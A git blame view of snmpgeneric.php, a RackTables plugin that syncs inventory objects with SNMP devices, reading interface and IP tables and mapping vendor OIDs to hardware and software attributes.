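Losing the key makes the archived bytes permanently unreadable, which is exactly why the key-backup advice above matters.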
Fixed Rack,Row and Location Bug [racktables-contribs] / snmpgeneric.php CommitLineData 9276dc97 ME 1<?php 2 3/******************************************** 4 * 30bf198b 5 * RackTables 0.20.x snmpgeneric extension 9276dc97 6 * 30bf198b 7 * sync an RackTables object with an SNMP device. 9276dc97 8 * 30bf198b 9 * Should work with almost any SNMP capable device. 9276dc97 10 * 30bf198b 11 * reads SNMP tables: 12 * - system 13 * - ifTable 14 * - ifxTable 15 * - ipAddrTable (ipv4 only) 16 * - ipAddressTable (ipv4 + ipv6) 2141ed46 17 * - ipv6AddrAddress (ipv6) 30bf198b 18 * 19 * Features: 20 * - update object attributes 21 * - create networks 22 * - create ports 23 * - add and bind ip addresses 7c2cfc75 24 * - create as new object 365fb193 25 * - save snmp settings per object (uses comment field) 30bf198b 26 * 27 * Known to work with: 28 * - Enterasys SecureStacks, S-Series 29 * - cisco 2620XM (thx to Rob) 30 * - hopefully many others 31 * 32 * 33 * Usage: 34 * 35 * 1. select "SNMP generic sync" tap 36 * 2. select your SNMP config (host, v1, v2c or v3, ...) 37 * 3. hit "Show List" 38 * 4. you will see a selection of all information that could be retrieved 39 * 5. select what should be updated and/or created 40 * 6. hit "Create" Button to make changes to RackTables 41 * 7. repeat step 1. to 6. as often as you like / need 9276dc97 42 * 9276dc97 43 * 9276dc97 44 * needs PHP 5 30bf198b 45 * 9276dc97 46 * TESTED on FreeBSD 9.0, nginx/1.0.12, php 5.3.10, NET-SNMP 5.7.1 30bf198b 47 * and RackTables <= 0.20.3 9276dc97 48 * af78a786 49 * (c)2015 Maik Ehinger <[email protected]> 9276dc97 ME 50 */ 51 52/**** 53 * INSTALL 02a702a1 54 * just place file in plugins directory 30bf198b 55 * 56 */ 57 58/** 59 * The newest version of this plugin can be found at: 60 * 61 * https://github.com/github138/myRT-contribs/tree/develop-0.20.x 62 * 9276dc97 ME 63 */ 64 65/* TODOs 30bf198b 66 * 9276dc97 ME 67 * - code cleanup 68 * 30bf198b 69 * - test if device supports mibs 9276dc97 ME 70 * - gethostbyaddr / gethostbyname host list 71 * - correct iif_name display if != 1 72 * 73 * - set more Object attributs / fields 9276dc97 74 * 365fb193 75 * - Input variables exceeded 1000 ccf830c6 76 * - update iftypes 365fb193 77 * 9276dc97 ME 78 */ 79 1fc7fc7d 80/* RackTables Debug Mode */ 81//$debug_mode=1; 82 30bf198b 83require_once('inc/snmp.php'); 9276dc97 ME 84 85$tab['object']['snmpgeneric'] = 'SNMP Generic sync'; 86$tabhandler['object']['snmpgeneric'] = 'snmpgeneric_tabhandler'; 00f9fc86 87$trigger['object']['snmpgeneric'] = 'snmpgeneric_tabtrigger'; 9276dc97 ME 88 89$ophandler['object']['snmpgeneric']['create'] = 'snmpgeneric_opcreate'; 90 91/* snmptranslate command */ 92$sg_cmd_snmptranslate = '/usr/local/bin/snmptranslate'; 93 94/* create ports without connector */ 95$sg_create_noconnector_ports = FALSE; 96 97/* deselect add port for this snmp port types */ 98$sg_ifType_ignore = array( 99 '1', /* other */ 100 '24', /* softwareLoopback */ 101 '23', /* ppp */ 102 '33', /* rs232 */ 30bf198b 103 '34', /* para */ 9276dc97 ME 104 '53', /* propVirtual */ 105 '77', /* lapd */ 106 '131', /* tunnel */ 107 '136', /* l3ipvlan */ 108 '160', /* usb */ 109 '161', /* ieee8023adLag */ 110); 111 112/* ifType to RT oif_id mapping */ 113$sg_ifType2oif_id = array( 114 /* 440 causes SQLSTATE[23000]: Integrity constraint violation: 30bf198b 115 * 1452 Cannot add or update a child row: 9276dc97 ME 116 * a foreign key constraint fails 117 */ 118 // '1' => 440, /* other => unknown 440 */ 119 '1' => 1469, /* other => virutal port 1469 */ 30bf198b 120 '6' 
=> 24, /* ethernetCsmacd => 1000BASE-T 24 */ 9276dc97 ME 121 '24' => 1469, /* softwareLoopback => virtual port 1469 */ 122 '33' => 1469, /* rs232 => RS-232 (DB-9) 681 */ 30bf198b 123 '34' => 1469, /* para => virtual port 1469 */ 9276dc97 124 '53' => 1469, /* propVirtual => virtual port 1469 */ 56d281de 125 '62' => 19, /* fastEther => 100BASE-TX 19 */ 9276dc97 ME 126 '131' => 1469, /* tunnel => virtual port 1469 */ 127 '136' => 1469, /* l3ipvlan => virtual port 1469 */ 128 '160' => 1469, /* usb => virtual port 1469 */ 129 '161' => 1469, /* ieee8023adLag => virtual port 1469 */ 130); 131 132/* -------------------------------------------------- */ 133 134/* snmp vendor list http://www.iana.org/assignments/enterprise-numbers */ 135 136$sg_known_sysObjectIDs = array 137( 138 /* ------------ default ------------ */ 139 'default' => array 140 ( 141 // 'text' => 'default', 142 'pf' => array('snmpgeneric_pf_entitymib'), 143 'attr' => array 144 ( 30bf198b 145 2 => array('pf' => 'snmpgeneric_pf_hwtype'), /* HW Typ*/ 9276dc97 ME 146 3 => array('oid' => 'sysName.0'), 147 /* FQDN check only if regex matches */ 148 //3 => array('oid' => 'sysName.0', 'regex' => '/^[^ .]+(\.[^ .]+)+\.?/', 'uncheck' => 'no FQDN'), 149 4 => array('pf' => 'snmpgeneric_pf_swtype', 'uncheck' => 'experimental'), /* SW type */ 150 14 => array('oid' => 'sysContact.0'), /* Contact person */ 151 // 1235 => array('value' => 'Constant'), 30bf198b 152 ), 9276dc97 153 'port' => array 30bf198b 154 ( 9276dc97 ME 155 // 'AC-in' => array('porttypeid' => '1-16', 'uncheck' => 'uncheck reason/comment'), 156 // 'name' => array('porttypeid' => '1-24', 'ifDescr' => 'visible label'), 157 ), 158 ), 159 160 /* ------------ ciscoSystems --------------- */ 161/* '9' => array 162 * ( 163 * 'text' => 'ciscoSystems', 164 * ), 165 */ 166 '9.1' => array 167 ( 168 'text' => 'ciscoProducts', 169 'attr' => array( 170 4 => array('pf' => 'snmpgeneric_pf_catalyst'), /* SW type/version */ 171 16 => array('pf' => 'snmpgeneric_pf_ciscoflash'), /* flash memory */ 30bf198b 172 9276dc97 173 ), 30bf198b 174 9276dc97 ME 175 ), 176 /* ------------ Microsoft --------------- */ 177 '311' => array 178 ( 179 'text' => 'Microsoft', 180 'attr' => array( 181 4 => array('pf' => 'snmpgeneric_pf_swtype', 'oid' => 'sysDescr.0', 'regex' => '/.* Windows Version (.*?) 
.*/', 'replacement' => 'Windows \\1', 'uncheck' => 'TODO RT matching'), /*SW type */ 182 ), 183 ), 184 /* ------------ Enterasys --------------- */ 185 '5624' => array 186 ( 187 'text' => 'Enterasys', 188 'attr' => array( 189 4 => array('pf' => 'snmpgeneric_pf_enterasys'), /* SW type/version */ 190 ), 191 ), 192 193 /* Enterasys N3 */ 194 '5624.2.1.53' => array 30bf198b 195 ( 0ffff63b 196 'dict_key' => 2021, 197 'text' => 'Matrix N3', 30bf198b 198 ), 9276dc97 ME 199 200 '5624.2.2.284' => array 30bf198b 201 ( 9276dc97 202 'dict_key' => 50002, 30bf198b 203 'text' => 'Securestack C2', 204 ), 9276dc97 ME 205 206 '5624.2.1.98' => array 30bf198b 207 ( 9276dc97 208 'dict_key' => 50002, 30bf198b 209 'text' => 'Securestack C3', 210 ), 9276dc97 ME 211 212 '5624.2.1.100' => array 30bf198b 213 ( 9276dc97 214 'dict_key' => 50002, 30bf198b 215 'text' => 'Securestack B3', 216 ), 9276dc97 ME 217 218 '5624.2.1.128' => array 30bf198b 219 ( 0ffff63b 220 'dict_key' => 1970, 221 'text' => 'S-series SSA130', 30bf198b 222 ), 9276dc97 ME 223 224 '5624.2.1.129' => array 30bf198b 225 ( 0ffff63b 226 'dict_key' => 1970, 227 'text' => 'S-series SSA150', 30bf198b 228 ), 9276dc97 ME 229 230 '5624.2.1.137' => array 30bf198b 231 ( 0ffff63b 232 'dict_key' => 1987, 30bf198b 233 'text' => 'Securestack B5 POE', 234 ), 9276dc97 ME 235 236 /* S3 */ 237 '5624.2.1.131' => array 238 ( 0ffff63b 239 'dict_key' => 1974, 240 'text' => 'S-series S3', 9276dc97 ME 241 ), 242 243 /* S4 */ 244 '5624.2.1.132' => array 245 ( 0ffff63b 246 'dict_key' => 1975, 247 'text' => 'S-series S4' 9276dc97 ME 248 ), 249 250 /* S8 */ 251 '5624.2.1.133' => array 252 ( 0ffff63b 253 'dict_key' => 1977, 254 'text' => 'S-series S8' 255 ), 256 257 '5624.2.1.165' => array 258 ( 259 'dict_key' => 1971, 260 'text' => 'S-series Bonded SSA', 9276dc97 ME 261 ), 262 263 /* ------------ net-snmp --------------- */ 264 '8072' => array 265 ( 30bf198b 266 'text' => 'net-snmp', 9276dc97 ME 267 'attr' => array( 268 4 => array('pf' => 'snmpgeneric_pf_swtype', 'oid' => 'sysDescr.0', 'regex' => '/(.*?) .*? (.*?) .*/', 'replacement' => '\\1 \\2', 'uncheck' => 'TODO RT matching'), /*SW type */ 269 ), 270 ), 271 272 /* ------------ Frauenhofer FOKUS ------------ */ 273 '12325' => array 274 ( 275 'text' => 'Fraunhofer FOKUS', 276 'attr' => array( 277 4 => array('pf' => 'snmpgeneric_pf_swtype', 'oid' => 'sysDescr.0', 'regex' => '/.*? .*? (.*? 
.*).*/', 'replacement' => '\\1', 'uncheck' => 'TODO RT matching'), /*SW type */ 278 ), 279 ), 280 281 '12325.1.1.2.1.1' => array 282 ( 283 'dict_key' => 42, /* Server model noname/unknown */ 284 'text' => 'BSNMP - mini SNMP daemon (bsnmpd)', 285 ), 286 287) + $known_switches; 288/* add snmp.php known_switches */ 289 290/* ------------ Sample function --------------- */ 291/* 292 * Sample Precessing Function (pf) 293 */ 294function snmpgeneric_pf_sample(&$snmp, &$sysObjectID, $attr_id) { 295 296 $object = &$sysObjectID['object']; 297 $attr = &$sysObjectID['attr'][$attr_id]; 298 299 if(!isset($attr['oid'])) 300 return; 301 302 /* output success banner */ 303 showSuccess('Found sysObjectID '.$sysObjectID['value']); 304 305 /* access attribute oid setting and do snmpget */ 306 $oid = $attr['oid']; 307 $value = $snmp->get($oid); 308 309 /* set new attribute value */ 310 $attr['value'] = $value; 311 312 /* do not check attribute per default */ 313 $attr['uncheck'] = "comment"; 314 315 /* set informal comment */ 316 $attr['comment'] = "comment"; 317 318 /* add additional ports */ 319 // $sysObjectID['port']['name'] = array('porttypeid' => '1-24', 'ifPhysAddress' => '001122334455', 'ifDescr' => 'visible label', 'uncheck' => 'comment', 'disabled' => 'porttypeid select disabled'); 320 321 /* set other attribute */ 322// $sysObjectID['attr'][1234]['value'] = 'attribute value'; 323 324} /* snmpgeneric_pf_sample */ 325 326/* ------------ Enterasys --------------- */ 327 328function snmpgeneric_pf_enterasys(&$snmp, &$sysObjectID, $attr_id) { 329 330 $attrs = &$sysObjectID['attr']; 331 332 //snmpgeneric_pf_entitymib($snmp, $sysObjectID, $attr_id); 333 334 /* TODO find correct way to get Bootroom and Firmware versions */ 335 336 /* Model */ 30bf198b 337 /*if(preg_match('/.*\.([^.]+)$/', $sysObjectID['value'], $matches)) { 9276dc97 ME 338 * showNotice('Device '.$matches[1]); 339 *} 340 */ 341 342 /* TODO SW type */ 343 //$attrs[4]['value'] = 'Enterasys'; /* SW type */ a2ce4850 344 $attrs[4]['key'] = '0'; /* SW type dict key 0 = NOT SET*/ 9276dc97 ME 345 346 /* set SW version only if not already set by entitymib */ 347 if(isset($attrs[5]['value']) && !empty($attrs[5]['value'])) { 30bf198b 348 9276dc97 349 /* SW version from sysDescr */ 30bf198b 350 if(preg_match('/^Enterasys .* Inc\. 
(.+) [Rr]ev ([^ ]+) ?(.*)$/', $snmp->sysDescr, $matches)) { 9276dc97 ME 351 352 $attrs[5]['value'] = $matches[2]; /* SW version */ 30bf198b 353 9276dc97 ME 354 // showSuccess("Found Enterasys Model ".$matches[1]); 355 } 356 357 } /* SW version */ 358 359 /* add serial port */ 30bf198b 360 //$sysObjectID['port']['console'] = array('porttypeid' => '1-29', 'ifDescr' => 'console', 'disabled' => 'disabled'); 9276dc97 ME 361 362} 363 364/* ------------ Cisco --------------- */ 365 366/* logic from snmp.php */ 367function snmpgeneric_pf_catalyst(&$snmp, &$sysObjectID, $attr_id) { 368 $attrs = &$sysObjectID['attr']; 30bf198b 369 $ports = &$sysObjectID['port']; 9276dc97 ME 370 371 /* sysDescr multiline on C5200 */ 372 if(preg_match ('/.*, Version ([^ ]+), .*/', $snmp->sysDescr, $matches)) { 373 $exact_release = $matches[1]; 30bf198b 374 $major_line = preg_replace ('/^([[:digit:]]+\.[[:digit:]]+)[^[:digit:]].*/', '\\1', $exact_release); 9276dc97 ME 375 376 $ios_codes = array 30bf198b 377 ( 378 '12.0' => 244, 379 '12.1' => 251, 380 '12.2' => 252, 381 ); 382 9276dc97 ME 383 $attrs[5]['value'] = $exact_release; 384 30bf198b 385 if (array_key_exists ($major_line, $ios_codes)) a2ce4850 386 { 9276dc97 387 $attrs[4]['value'] = $ios_codes[$major_line]; a2ce4850 388 $attrs[4]['key'] = $ios_codes[$major_line]; 389 } 9276dc97 ME 390 391 } /* sw type / version */ 392 393 $sysChassi = $snmp->get ('1.3.6.1.4.1.9.3.6.3.0'); 394 if ($sysChassi !== FALSE or $sysChassi !== NULL) 395 $attrs[1]['value'] = str_replace ('"', '', $sysChassi); 396 30bf198b 397 $ports['con0'] = array('porttypeid' => '1-29', 'ifDescr' => 'console'); // RJ-45 RS-232 console 9276dc97 ME 398 399 if (preg_match ('/Cisco IOS Software, C2600/', $snmp->sysDescr)) 30bf198b 400 $ports['aux0'] = array('porttypeid' => '1-29', 'ifDescr' => 'auxillary'); // RJ-45 RS-232 aux port 9276dc97 ME 401 402 // blade devices are powered through internal circuitry of chassis 403 if ($sysObjectID['value'] != '9.1.749' and $sysObjectID['value'] != '9.1.920') 404 { 30bf198b 405 $ports['AC-in'] = array('porttypeid' => '1-16'); 9276dc97 ME 406 } 407 408} /* snmpgeneric_pf_catalyst */ 409 410/* -------------------------------------------------- */ 411function snmpgeneric_pf_ciscoflash(&$snmp, &$sysObjectID, $attr_id) { 30bf198b 412 /* 9276dc97 ME 413 * ciscoflashMIB = 1.3.6.1.4.1.9.9.10 414 */ 415 /* 416 | 16 | uint | flash memory, MB | 417 */ 418 $attrs = &$sysObjectID['attr']; 419 30bf198b 420 $ciscoflash = $snmp->walk('1.3.6.1.4.1.9.9.10.1.1.2'); /* ciscoFlashDeviceTable */ 9276dc97 421 5eb2e24f 422 if(!$ciscoflash) 423 return; 424 9276dc97 ME 425 $flash = array_keys($ciscoflash, 'flash'); 426 427 foreach($flash as $oid) { 428 if(!preg_match('/(.*)?\.[^\.]+\.([^\.]+)$/',$oid,$matches)) 429 continue; 430 431 $index = $matches[2]; 432 $prefix = $matches[1]; 433 434 showSuccess("Found Flash: ".$ciscoflash[$prefix.'.8.'.$index]." ".$ciscoflash[$prefix.'.2.'.$index]." 
bytes"); 435 30bf198b 436 $attrs[16]['value'] = ceil($ciscoflash[$prefix.'.2.'.$index] / 1024 / 1024); /* ciscoFlashDeviceSize */ 9276dc97 ME 437 438 } 439 440 /* 441 * ciscoMemoryPoolMIB = 1.3.6.1.4.1.9.9.48 442 * ciscoMemoryPoolUsed .1.1.1.5 443 * ciscoMemoryPoolFree .1.1.1.6 444 */ 445 446 $ciscomem = $snmp->walk('1.3.6.1.4.1.9.9.48'); 447 448 if(!empty($ciscomem)) { 449 450 $used = 0; 451 $free = 0; 452 453 foreach($ciscomem as $oid => $value) { 30bf198b 454 9276dc97 ME 455 switch(preg_replace('/.*?(\.1\.1\.1\.[^\.]+)\.[^\.]+$/','\\1',$oid)) { 456 case '.1.1.1.5': 457 $used += $value; 458 break; 459 case '.1.1.1.6': 460 $free += $value; 461 break; 462 } 463 464 } 465 30bf198b 466 $attrs[17]['value'] = ceil(($free + $used) / 1024 / 1024); /* RAM, MB */ 9276dc97 ME 467 } 468 469} /* snmpgeneric_pf_ciscoflash */ 470 471/* -------------------------------------------------- */ 472/* -------------------------------------------------- */ 473 474/* HW Type processor function */ 475function snmpgeneric_pf_hwtype(&$snmp, &$sysObjectID, $attr_id) { 476 477 $attr = &$sysObjectID['attr'][$attr_id]; 478 479 if (isset($sysObjectID['dict_key'])) { 480 481 $value = $sysObjectID['dict_key']; 482 showSuccess("Found HW type dict_key: $value"); 30bf198b 483 9276dc97 ME 484 /* return array of attr_id => attr_value) */ 485 $attr['value'] = $value; a2ce4850 486 $attr['key'] = $value; 9276dc97 ME 487 488 } else { 489 showNotice("HW type dict_key not set - Unknown OID"); 490 } 491 492} /* snmpgeneric_pf_hwtype */ 493 494/* -------------------------------------------------- */ 495 496/* SW type processor function */ 497/* experimental */ 498/* Find a way to match RT SW types !? */ 499function snmpgeneric_pf_swtype(&$snmp, &$sysObjectID, $attr_id) { 500 501 /* 4 = SW type */ 502 30bf198b 503 $attr = &$sysObjectID['attr'][$attr_id]; 9276dc97 ME 504 505 $object = &$sysObjectID['object']; 506 507 $objtype_id = $object['objtype_id']; 508 509 if(isset($attr['oid'])) 510 $oid = $attr['oid']; 511 else 30bf198b 512 $oid = 'sysDescr.0'; 9276dc97 ME 513 514 $raw_value = $snmp->get($oid); 515 516 $replacement = '\\1'; 517 518 if(isset($attr['regex'])) { 519 $regex = $attr['regex']; 520 521 if(isset($attr['replacement'])) 522 $replacement = $attr['replacement']; 523 524 } else { 525 $list = array('bsd','linux','centos','suse','fedora','ubuntu','windows','solaris','vmware'); 526 527 $regex = '/.* ([^ ]*('.implode($list,'|').')[^ ]*) .*/i'; 528 $replacement = '\\1'; 529 } 530 531 $value = preg_replace($regex, $replacement, $raw_value, -1, $count); 532 //$attr['value'] = $value; 533 534 if(!empty($value) && $count > 0) { 535 /* search dict_key for value in RT Dictionary */ 536 /* depends on object type server(13)/switch(14)/router(15) */ 30bf198b 537 $result = usePreparedSelectBlade 538 ( 539 'SELECT dict_key,dict_value FROM Dictionary WHERE chapter_id in (13,14,15) and dict_value like ? 
order by dict_key desc limit 1', 540 array ('%'.$value.'%') 541 ); 542 $row = $result->fetchAll(PDO::FETCH_GROUP|PDO::FETCH_UNIQUE|PDO::FETCH_COLUMN); 9276dc97 ME 543 544 if(!empty($row)) { 545 $RTvalue = key($row); 546 547 if(isset($attr['comment'])) 548 $attr['comment'] .= ", $value ($RTvalue) ".$row[$RTvalue]; 549 else 550 $attr['comment'] = "$value ($RTvalue) ".$row[$RTvalue]; 551 552 showSuccess("Found SW type: $value ($RTvalue) ".$row[$RTvalue]); 553 $value = $RTvalue; 554 } 555 556 /* set attr value */ 557 $attr['value'] = $value; a2ce4850 558 $attr['key'] = $value; 9276dc97 ME 559 // unset($attr['uncheck']); 560 561 } 562 563 if(isset($attr['comment'])) 564 $attr['comment'] .= ' (experimental)'; 565 else 566 $attr['comment'] = '(experimental)'; 567 568} /* snmpgeneric_pf_swtype */ 569 570/* -------------------------------------------------- */ 30bf198b 571/* try to set SW version 9276dc97 ME 572 * and add some AC ports 573 * 574 */ 575/* needs more testing */ 576function snmpgeneric_pf_entitymib(&$snmp, &$sysObjectID, $attr_id) { 30bf198b 577 9276dc97 ME 578 /* $attr_id == NULL -> device pf */ 579 580 $attrs = &$sysObjectID['attr']; 581 $ports = &$sysObjectID['port']; 582 583 $entPhysicalClass = $snmp->walk('.1.3.6.1.2.1.47.1.1.1.1.5'); /* entPhysicalClass */ 584 585 if(empty($entPhysicalClass)) 586 return; 587 588 showNotice("Found Entity Table (Experimental)"); 589 30bf198b 590/* PhysicalClass 9276dc97 ME 591 * 1:other 592 * 2:unknown 593 * 3:chassis 594 * 4:backplane 595 * 5:container 596 * 6:powerSupply 597 * 7:fan 598 * 8:sensor 599 * 9:module 600 * 10:port 601 * 11:stack 602 * 12:cpu 603 */ 604 605 /* chassis */ 606 607 /* always index = 1 ??? */ 608 $chassis = array_keys($entPhysicalClass, '3'); /* 3 chassis */ 609 610 if(0) 611 if(!empty($chassis)) { 612 echo '<table>'; 613 614 foreach($chassis as $key => $oid) { 615 /* get index */ 30bf198b 616 if(!preg_match('/\.(\d+)$/',$oid, $matches)) 9276dc97 ME 617 continue; 618 30bf198b 619 $index = $matches[1]; 620 621 $name = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.7.$index"); 622 $serialnum = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.11.$index"); 623 $mfgname = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.12.$index"); 624 $modelname = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.13.$index"); 9276dc97 625 9276dc97 ME 626 //showNotice("$name $mfgname $modelname $serialnum"); 627 628 echo("<tr><td>$name</td><td>$mfgname</td><td>$modelname</td><td>$serialnum</td>"); 629 } 630 unset($key); 631 unset($oid); 632 633 echo '</table>'; 634 } /* chassis */ 635 636 637 638 /* modules */ 639 640 $modules = array_keys($entPhysicalClass, '9'); /* 9 Modules */ 641 642 if(!empty($modules)) { 643 644 echo '<br><br>Modules<br><table>'; 645 echo("<tr><th>Name</th><th>MfgName</th><th>ModelName</th><th>HardwareRev</th><th>FirmwareRev</th><th>SoftwareRev</th><th>SerialNum</th>"); 30bf198b 646 9276dc97 ME 647 foreach($modules as $key => $oid) { 648 649 /* get index */ 30bf198b 650 if(!preg_match('/\.(\d+)$/',$oid, $matches)) 9276dc97 ME 651 continue; 652 30bf198b 653 $index = $matches[1]; 654 655 $name = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.7.$index"); 5eb2e24f 656 657 if(!$name) 658 continue; 659 30bf198b 660 $hardwarerev = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.8.$index"); 661 $firmwarerev = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.9.$index"); 662 $softwarerev = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.10.$index"); 663 $serialnum = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.11.$index"); 664 $mfgname = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.12.$index"); 665 $modelname = 
$snmp->get(".1.3.6.1.2.1.47.1.1.1.1.13.$index"); 9276dc97 666 9276dc97 ME 667 //showNotice("$name $mfgname $modelname $hardwarerev $firmwarerev $softwarerev $serialnum"); 668 669 echo("<tr><td>".(empty($name) ? '-' : $name )."</td><td>$mfgname</td><td>$modelname</td><td>$hardwarerev</td><td>$firmwarerev</td><td>$softwarerev</td><td>$serialnum</td>"); 670 671 /* set SW version to first module software version */ 672 if($key == 0 ) { 673 674 $attrs[5]['value'] = $softwarerev; /* SW version */ 675 $attrs[5]['comment'] = 'entity MIB'; 676 } 677 678 } 679 unset($key); 680 unset($oid); 681 682 echo '</table>'; 683 } 684 685 686 /* add AC ports */ 687 $powersupply = array_keys($entPhysicalClass, '6'); /* 6 powerSupply */ 688 $count = 1; 689 foreach($powersupply as $oid) { 690 691 /* get index */ 30bf198b 692 if(!preg_match('/\.(\d+)$/',$oid, $matches)) 9276dc97 ME 693 continue; 694 30bf198b 695 $index = $matches[1]; 696 $descr = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.2.$index"); 9276dc97 697 30bf198b 698 $ports['AC-'.$count] = array('porttypeid' => '1-16', 'ifDescr' => $descr, 'comment' => 'entity MIB', 'uncheck' => ''); 9276dc97 ME 699 $count++; 700 } 701 unset($oid); 702} 703 704/* -------------------------------------------------- */ 705 706/* 707 * regex processor function 708 * needs 'oid' and 'regex' 709 * uses first back reference as attribute value 710 */ 711function snmpgeneric_pf_regex(&$snmp, &$sysObjectID, $attr_id) { 712 713 $attr = &$sysObjectID['attr'][$attr_id]; 714 715 if (isset($attr['oid']) && isset($attr['regex'])) { 716 717 $oid = $attr['oid']; 718 $regex = $attr['regex']; 719 720 $raw_value = $snmp->get($oid); 721 722 723 if(isset($attr['replacement'])) 724 $replace = $attr['replacement']; 725 else 726 $replace = '\\1'; 727 728 $value = preg_replace($regex,$replace, $raw_value); 30bf198b 729 9276dc97 ME 730 /* return array of attr_id => attr_value) */ 731 $attr['value'] = $value; 732 30bf198b 733 } 9276dc97 ME 734 // else Warning ?? 
/* -------------------------------------------------- */

/*
 * regex processor function
 * needs 'oid' and 'regex'
 * uses first back reference as attribute value
 */
function snmpgeneric_pf_regex(&$snmp, &$sysObjectID, $attr_id) {

	$attr = &$sysObjectID['attr'][$attr_id];

	if (isset($attr['oid']) && isset($attr['regex'])) {

		$oid = $attr['oid'];
		$regex = $attr['regex'];

		$raw_value = $snmp->get($oid);

		if(isset($attr['replacement']))
			$replace = $attr['replacement'];
		else
			$replace = '\\1';

		$value = preg_replace($regex,$replace, $raw_value);

		/* return array of attr_id => attr_value */
		$attr['value'] = $value;

	}
	// else Warning ??

} /* snmpgeneric_pf_regex */

/* -------------------------------------------------- */
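/*
 * Illustrative sketch only: an attribute entry that snmpgeneric_pf_regex()
 * can process needs an 'oid' and a 'regex'; the first back reference (or
 * 'replacement', if set) becomes the attribute value. The attr id and OID
 * below are hypothetical.
 */
//	$sg_known_sysObjectIDs['default']['attr'][3] = array(
//		'pf' => 'snmpgeneric_pf_regex',
//		'oid' => 'sysName.0',
//		'regex' => '/^([^.]+)\..*$/',	/* keep the host part of the FQDN */
//		'replacement' => '\\1',
//	);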
--> $comment"; 852 853 commitUpdateObject($object_id, $object['name'], NULL, $object['has_problems'], NULL, $comment ); 854 showNotice("$setcomment SNMP Settings: $newsnmpstr"); 855 856 } 857 858 } 859 8188a17c 860 if(isset($_POST['snmpconfig']) && $_POST['snmpconfig'] == '1') { 861 snmpgeneric_list($object_id); 9276dc97 ME 862 } else { 863 snmpgeneric_snmpconfig($object_id); 864 } 865} /* snmpgeneric_tabhandler */ 866 867/* -------------------------------------------------- */ 868 00f9fc86 869function snmpgeneric_tabtrigger() { 870 // display tab only on IPv4 Objects 871 return considerConfiguredConstraint (spotEntity ('object', getBypassValue()), 'IPV4OBJ_LISTSRC') ? 'std' : ''; 872} /* snmpgeneric_tabtrigger */ 9276dc97 ME 873 874/* -------------------------------------------------- */ 875 876function snmpgeneric_snmpconfig($object_id) { 877 9276dc97 ME 878 879 $object = spotEntity ('object', $object_id); 880 //$object['attr'] = getAttrValues($object_id); 881 $endpoints = findAllEndpoints ($object_id, $object['name']); 882 883 addJS('function showsnmpv3(element) { 30bf198b 884 var style; 2bfc8235 885 if(element.value != \'v3\') { 9276dc97 ME 886 style = \'none\'; 887 document.getElementById(\'snmp_community_label\').style.display=\'\'; 888 } else { 889 style = \'\'; 890 document.getElementById(\'snmp_community_label\').style.display=\'none\'; 891 } 892 30bf198b 893 var elements = document.getElementsByName(\'snmpv3\'); 894 for(var i=0;i<elements.length;i++) { 9276dc97 ME 895 elements[i].style.display=style; 896 } 897 };',TRUE); 898 8188a17c 899 addJS('function shownewobject(element) { 900 var style; 901 902 if(element.checked) { 903 style = \'\'; 904 } else { 905 style = \'none\'; 906 } 907 908 var elements = document.getElementsByName(\'newobject\'); 909 for(var i=0;i<elements.length;i++) { 910 elements[i].style.display=style; 911 } 912 };',TRUE); 913 30bf198b 914 addJS('function checkInput() { 915 var host = document.getElementById(\'host\'); 916 917 if(host.value == "-1") { 918 var newvalue = prompt("Enter Hostname or IP Address",""); 919 if(newvalue != "") { 920 host.options[host.options.length] = new Option(newvalue, newvalue); 921 host.value = newvalue; 922 } 923 } 924 925 if(host.value != "-1" && host.value != "") 926 return true; 927 else 928 return false; 929 };',TRUE); 930 8188a17c 931 echo '<body onload="document.getElementById(\'submitbutton\').focus(); showsnmpv3(document.getElementById(\'snmpversion\')); shownewobject(document.getElementById(\'asnewobject\'));">'; 932 9276dc97 ME 933 foreach( $endpoints as $key => $value) { 934 $endpoints[$value] = $value; 935 unset($endpoints[$key]); 936 } 937 unset($key); 938 unset($value); 939 940 foreach( getObjectIPv4Allocations($object_id) as $ip => $value) { 941 30bf198b 942 $ip = ip_format($ip); 943 9276dc97 ME 944 if(!in_array($ip, $endpoints)) 945 $endpoints[$ip] = $ip; 946 } 947 unset($ip); 948 unset($value); 949 950 foreach( getObjectIPv6Allocations($object_id) as $value) { 30bf198b 951 $ip = ip_format(ip_parse($value['addrinfo']['ip'])); 9276dc97 ME 952 953 if(!in_array($ip, $endpoints)) 954 $endpoints[$ip] = $ip; 955 } 956 unset($value); 957 30bf198b 958 /* ask for ip/host name on submit see js checkInput() */ 959 $endpoints['-1'] = 'ask me'; 960 365fb193 961 // saved snmp settings 962 $snmpstr = strtok($object['comment'],"\n\r"); 963 $snmpstrarray = explode(':', $snmpstr); 964 965 if($snmpstrarray[0] == "SNMP") 966 { 2bfc8235 967 /* keep it compatible with older version */ 968 switch($snmpstrarray[2]) 969 { 970 case "1": 971 
function snmpgeneric_snmpconfig($object_id) {

	$object = spotEntity ('object', $object_id);
	//$object['attr'] = getAttrValues($object_id);
	$endpoints = findAllEndpoints ($object_id, $object['name']);

	addJS('function showsnmpv3(element) {
		var style;
		if(element.value != \'v3\') {
			style = \'none\';
			document.getElementById(\'snmp_community_label\').style.display=\'\';
		} else {
			style = \'\';
			document.getElementById(\'snmp_community_label\').style.display=\'none\';
		}

		var elements = document.getElementsByName(\'snmpv3\');
		for(var i=0;i<elements.length;i++) {
			elements[i].style.display=style;
		}
	};',TRUE);

	addJS('function shownewobject(element) {
		var style;

		if(element.checked) {
			style = \'\';
		} else {
			style = \'none\';
		}

		var elements = document.getElementsByName(\'newobject\');
		for(var i=0;i<elements.length;i++) {
			elements[i].style.display=style;
		}
	};',TRUE);

	addJS('function checkInput() {
		var host = document.getElementById(\'host\');

		if(host.value == "-1") {
			var newvalue = prompt("Enter Hostname or IP Address","");
			if(newvalue != "") {
				host.options[host.options.length] = new Option(newvalue, newvalue);
				host.value = newvalue;
			}
		}

		if(host.value != "-1" && host.value != "")
			return true;
		else
			return false;
	};',TRUE);

